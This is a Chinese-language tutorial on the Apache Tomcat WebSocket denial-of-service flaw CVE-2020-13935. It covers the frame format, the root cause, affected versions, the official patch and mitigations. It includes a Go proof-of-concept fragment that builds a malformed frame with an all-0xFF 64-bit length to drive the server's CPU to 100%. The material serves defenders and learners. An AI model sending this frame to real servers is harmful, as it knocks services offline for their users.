Apache Tomcat WebSocket DoS漏洞分析 (CVE-2020-13935) 教学文档<\/h1>

漏洞概述<\/h2>

漏洞名称<\/strong>: WebSocket DoS Vulnerability in Apache Tomcat (CVE-2020-13935)<\/p>

漏洞描述<\/strong>: Apache Tomcat的WebSocket实现中存在一个拒绝服务(DoS)漏洞，攻击者可以通过发送特制的WebSocket帧导致服务器进入无限循环，消耗CPU资源，最终导致服务不可用。<\/p>

影响版本<\/strong>:<\/p>

10.0.0-M1 to 10.0.0-M6<\/li>
9.0.0.M1 to 9.0.36<\/li>
8.5.0 to 8.5.56<\/li>
8.0.1 to 8.0.53<\/li>
7.0.27 to 7.0.104<\/li> <\/ul>
漏洞原理分析<\/h2>
WebSocket帧结构<\/h3>
根据RFC 6455，WebSocket帧的基本结构如下：<\/p>
0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-------+-+-------------+-------------------------------+ |F|R|R|R| opcode|M| Payload len | Extended payload length | |I|S|S|S| (4) |A| (7) | (16\/64) | |N|V|V|V| |S| | (if payload len==126\/127) | | |1|2|3| |K| | | +-+-+-+-+-------+-+-------------+ - - - - - - - - - - - - - - - + | Extended payload length continued, if payload len == 127 | + - - - - - - - - - - - - - - - +-------------------------------+ | |Masking-key, if MASK set to 1 | +-------------------------------+-------------------------------+ | Masking-key (continued) | Payload Data | +-------------------------------- - - - - - - - - - - - - - - - + : Payload Data continued ... : + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + | Payload Data continued ... | +---------------------------------------------------------------+ <\/code><\/pre> 载荷长度处理机制<\/h3> WebSocket帧中的"负载长度"(payload length)处理分为三种情况：<\/p> 短长度<\/strong>(≤125字节):<\/p> 直接使用7-bit payload length字段表示<\/li> <\/ul> <\/li> 中等长度<\/strong>(126-65535字节):<\/p> 7-bit payload length字段设置为126<\/li> 接下来的2个字节(16-bit)作为扩展长度<\/li> <\/ul> <\/li> 长长度<\/strong>(>65535字节):<\/p> 7-bit payload length字段设置为127<\/li> 接下来的8个字节(64-bit)作为扩展长度<\/li> <\/ul> <\/li> <\/ol> RFC 6455特别要求<\/strong>: 对于64-bit扩展长度，最高有效位(MSB)必须为0。<\/p> 漏洞根源<\/h3> 漏洞存在于java\/org\/apache\/tomcat\/websocket\/WsFrameBase.java<\/code>文件中，Tomcat在处理WebSocket帧时：<\/p> 当payload length设置为127时，会读取接下来的8个字节作为64-bit扩展长度<\/li> 未检查<\/strong>这64-bit扩展长度的最高有效位是否为0<\/li> 如果最高有效位为1，Java会将其解释为负数(因为Java没有无符号整数类型)<\/li> 后续处理负长度时导致无限循环<\/li> <\/ol> 漏洞验证与利用<\/h2> 构造恶意WebSocket帧<\/h3> 以下是构造恶意帧的关键步骤：<\/p> 设置帧头<\/strong>:<\/p> FIN=1 (表示这是消息的最后一帧)<\/li> RSV1-3=0 (保留位设为0)<\/li> opcode=1 (文本帧)<\/li> <\/ul> <\/li> 设置长度字段<\/strong>:<\/p> MASK=1 (客户端到服务器的帧必须掩码)<\/li> 7-bit payload length=127 (表示使用64-bit扩展长度)<\/li> 扩展长度字段设置为8个0xFF字节(违反RFC规范)<\/li> <\/ul> <\/li> 设置掩码键和载荷<\/strong>:<\/p> 使用简单的掩码键(如全0)<\/li> 实际载荷可以很短(如"test")<\/li> <\/ul> <\/li> <\/ol> PoC代码关键部分<\/h3> var<\/span> buf<\/span> bytes<\/span>.Buffer<\/span> <\/span><\/span> <\/span><\/span>\/\/ 设置帧头 <\/span><\/span><\/span><\/span>fin<\/span> :=<\/span> 1<\/span> <\/span><\/span>rsv1<\/span> :=<\/span> 0<\/span> <\/span><\/span>rsv2<\/span> :=<\/span> 0<\/span> <\/span><\/span>rsv3<\/span> :=<\/span> 0<\/span> <\/span><\/span>opcode<\/span> :=<\/span> websocket<\/span>.TextMessage<\/span> <\/span><\/span>buf<\/span>.WriteByte<\/span>(byte(fin<\/span><<<\/span>7<\/span> | rsv1<\/span><<<\/span>6<\/span> | rsv2<\/span><<<\/span>5<\/span> | rsv3<\/span><<<\/span>4<\/span> | opcode<\/span>)) <\/span><\/span> <\/span><\/span>\/\/ 设置长度字段 <\/span><\/span><\/span><\/span>buf<\/span>.WriteByte<\/span>(byte(1<\/span><<<\/span>7<\/span> | 0b1111111<\/span>)) \/\/ MASK=1, payload len=127 <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 设置8个0xFF作为扩展长度(违反RFC规范) <\/span><\/span><\/span><\/span>buf<\/span>.Write<\/span>([]byte<\/span>{0xFF<\/span>, 0xFF<\/span>, 0xFF<\/span>, 0xFF<\/span>, 0xFF<\/span>, 0xFF<\/span>, 0xFF<\/span>, 0xFF<\/span>}) <\/span><\/span> <\/span><\/span>\/\/ 设置掩码键(简单全0) <\/span><\/span><\/span><\/span>maskingKey<\/span> :=<\/span> []byte<\/span>{0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>} <\/span><\/span>buf<\/span>.Write<\/span>(maskingKey<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 设置实际载荷 <\/span><\/span><\/span><\/span>buf<\/span>.WriteString<\/span>("test"<\/span>) <\/span><\/span><\/code><\/pre>检测方法<\/h3> 搭建受影响版本的Tomcat环境(如9.0.31)<\/li> 寻找WebSocket端点(如Tomcat自带的examples: http:\/\/localhost:8080\/examples\/websocket\/echo.xhtml<\/code>)<\/li> 使用PoC连接到WebSocket端点(如ws:\/\/localhost:8080\/examples\/websocket\/echoProgrammatic<\/code>)<\/li> 观察服务器CPU使用率是否持续100%<\/li> <\/ol> 修复方案<\/h2> 官方修复<\/h3> 修复提交在commit 40fa74c7，主要修改了WsFrameBase.java<\/code>文件，增加了对payload length的校验：<\/p> \/\/ The most significant bit of those 8 bytes is required to be zero <\/span><\/span><\/span>\/\/ (see RFC 6455, section 5.2). If the most significant bit is set, <\/span><\/span><\/span>\/\/ the resulting payload length will be negative so test for that. <\/span><\/span><\/span><\/span>if<\/span> (<\/span>payloadLength <<\/span> 0<\/span>)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> WsIOException(<\/span> <\/span><\/span> new<\/span> CloseReason(<\/span>CloseCodes.<\/span>PROTOCOL_ERROR<\/span>,<\/span> <\/span><\/span> sm.<\/span>getString<\/span>(<\/span>"wsFrame.payloadMsbInvalid"<\/span>)));<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>修复建议<\/strong>: 升级到以下或更高版本:<\/p> 10.0.0-M7+<\/li> 9.0.37+<\/li> 8.5.57+<\/li> 8.0.54+<\/li> 7.0.105+<\/li> <\/ul> 临时缓解措施<\/h3> 如果无法立即升级:<\/p> 禁用WebSocket功能<\/strong>: 如果不使用WebSocket，可以完全禁用<\/li> 限制访问<\/strong>: 通过WAF或防火墙限制对WebSocket端点的访问<\/li> 屏蔽默认端点<\/strong>: 拦截Tomcat默认WebSocket功能的URL，如: \/examples\/websocket\/echo.xhtml<\/code><\/li> \/examples\/websocket\/echoProgrammatic<\/code><\/li> \/examples\/websocket\/echoAnnotation<\/code><\/li> 其他examples相关端点<\/li> <\/ul> <\/li> <\/ol> 技术总结<\/h2> 漏洞类型<\/strong>: 拒绝服务(DoS)<\/li> 触发条件<\/strong>: 发送特制WebSocket帧，其中64-bit扩展长度的最高位为1<\/li> 影响<\/strong>: 导致Tomcat进程CPU使用率100%，服务不可用<\/li> 利用难度<\/strong>: 低，无需认证，构造简单<\/li> 修复关键<\/strong>: 严格遵循RFC 6455规范，校验扩展长度的最高位<\/li> <\/ol> 参考资源<\/h2> Apache Tomcat安全公告<\/a><\/li> Apache Bugzilla报告<\/a><\/li> CVE详细信息<\/a><\/li> RedTeam Pentesting博客分析<\/a><\/li> RFC 6455 - WebSocket协议<\/a><\/li> <\/ol>